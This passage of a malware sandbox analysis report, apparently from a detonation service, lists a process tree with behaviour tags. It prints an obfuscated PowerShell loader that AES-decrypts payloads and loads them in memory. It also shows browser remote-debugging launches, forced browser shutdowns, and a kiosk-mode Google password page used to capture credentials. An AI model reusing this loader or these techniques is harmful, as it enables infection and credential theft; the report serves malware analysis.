                                PID:1956
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4252
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
                                    8⤵
                                      PID:4180
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      8⤵
                                      • Blocklisted process makes network request
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2812
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                        9⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5784
                                • C:\Users\Admin\AppData\Local\Temp\1088428001\kdMujZh.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088428001\kdMujZh.exe"
                                  6⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Drops file in Windows directory
                                  • System Location Discovery: System Language Discovery
                                  PID:2632
                                • C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:5604
                                  • C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:5652
                                  • C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:5660
                                  • C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:5672
                                  • C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:5684
                                  • C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:5692
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 816
                                    7⤵
                                    • Program crash
                                    PID:5752
                                • C:\Users\Admin\AppData\Local\Temp\1088432001\198cfc7201.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088432001\198cfc7201.exe"
                                  6⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  PID:5236
                                • C:\Users\Admin\AppData\Local\Temp\1088433001\ymy1CwP.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088433001\ymy1CwP.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:5496
                                • C:\Users\Admin\AppData\Local\Temp\1088434001\ymy1CwP.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088434001\ymy1CwP.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:5868
                                • C:\Users\Admin\AppData\Local\Temp\1088435001\6ccbdd7074.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088435001\6ccbdd7074.exe"
                                  6⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  PID:6080
                                • C:\Users\Admin\AppData\Local\Temp\1088436001\ee1401f004.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088436001\ee1401f004.exe"
                                  6⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Downloads MZ/PE file
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Loads dropped DLL
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Checks processor information in registry
                                  PID:5160
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                    7⤵
                                    • Uses browser remote debugging
                                    • Enumerates system info in registry
                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    PID:4224
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe7393cc40,0x7ffe7393cc4c,0x7ffe7393cc58
                                      8⤵
                                        PID:5388
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1964,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1960 /prefetch:2
                                        8⤵
                                          PID:5500
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1968,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2008 /prefetch:3
                                          8⤵
                                            PID:4044
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2460 /prefetch:8
                                            8⤵
                                              PID:4132
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3216,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:1
                                              8⤵
                                              • Uses browser remote debugging
                                              PID:4780
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3280 /prefetch:1
                                              8⤵
                                              • Uses browser remote debugging
                                              PID:3992
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4524,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4580 /prefetch:8
                                              8⤵
                                                PID:5688
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4560,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4696 /prefetch:1
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:5604
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4836,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3860 /prefetch:8
                                                8⤵
                                                  PID:6056
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4960,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4964 /prefetch:8
                                                  8⤵
                                                    PID:5272
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                  7⤵
                                                  • Uses browser remote debugging
                                                  • Enumerates system info in registry
                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                  PID:1432
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe63ad46f8,0x7ffe63ad4708,0x7ffe63ad4718
                                                    8⤵
                                                    • Checks processor information in registry
                                                    • Enumerates system info in registry
                                                    PID:2496
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
                                                    8⤵
                                                      PID:2664
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
                                                      8⤵
                                                        PID:2872
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2992 /prefetch:8
                                                        8⤵
                                                          PID:5824
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                                                          8⤵
                                                          • Uses browser remote debugging
                                                          PID:5764
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
                                                          8⤵
                                                          • Uses browser remote debugging
                                                          PID:1372
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
                                                          8⤵
                                                          • Uses browser remote debugging
                                                          PID:6520
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
                                                          8⤵
                                                          • Uses browser remote debugging
                                                          PID:6528
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
                                                          8⤵
                                                            PID:6980
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1992 /prefetch:2
                                                            8⤵
                                                              PID:7152
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2660 /prefetch:2
                                                              8⤵
                                                                PID:6516
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2416 /prefetch:2
                                                                8⤵
                                                                  PID:6772
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2152 /prefetch:2
                                                                  8⤵
                                                                    PID:6936
                                                              • C:\Users\Admin\AppData\Local\Temp\1088437001\dd8dbe5ac0.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1088437001\dd8dbe5ac0.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious use of FindShellTrayWindow
                                                                • Suspicious use of SendNotifyMessage
                                                                PID:1072
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /F /IM firefox.exe /T
                                                                  7⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5212
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /F /IM chrome.exe /T
                                                                  7⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2140
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /F /IM msedge.exe /T
                                                                  7⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1432
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /F /IM opera.exe /T
                                                                  7⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5940
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /F /IM brave.exe /T
                                                                  7⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:528
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                  7⤵
                                                                    PID:5660
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                      8⤵
                                                                      • Checks processor information in registry
                                                                      • Modifies registry class
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious use of SendNotifyMessage
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:6076
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1780 -prefMapHandle 1776 -prefsLen 27446 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c1a6faa-9504-4fc9-8a18-f98d9796e8fd} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" gpu
                                                                        9⤵
                                                                          PID:4744
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2452 -prefsLen 28366 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d12bfa71-e830-4785-855f-a3e4eb45acae} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" socket
                                                                          9⤵
                                                                            PID:564
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2816 -childID 1 -isForBrowser -prefsHandle 2740 -prefMapHandle 3232 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {31644b6b-3ceb-4e1e-92fa-6cbc0b681a78} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab
                                                                            9⤵
                                                                              PID:5244
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3276 -childID 2 -isForBrowser -prefsHandle 3396 -prefMapHandle 3732 -prefsLen 32856 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7abd617d-a0f6-4aa8-a542-947e09992368} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab
                                                                              9⤵
                                                                                PID:5396
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4776 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4768 -prefMapHandle 4760 -prefsLen 32856 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b85c9d04-2811-4e91-8065-a275e9f816da} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" utility
                                                                                9⤵
                                                                                • Checks processor information in registry
                                                                                PID:1132
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5220 -childID 3 -isForBrowser -prefsHandle 5264 -prefMapHandle 5276 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64f8ca16-0a64-4652-a591-c5597fd79f16} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab
                                                                                9⤵
                                                                                  PID:1948
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5400 -childID 4 -isForBrowser -prefsHandle 5488 -prefMapHandle 5484 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9766da65-e26e-4c03-8f42-279784d591d3} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab
                                                                                  9⤵
                                                                                    PID:4740
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5508 -childID 5 -isForBrowser -prefsHandle 5684 -prefMapHandle 5680 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {18a2669b-050e-47cd-b5bc-4b4f656b9176} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab
                                                                                    9⤵
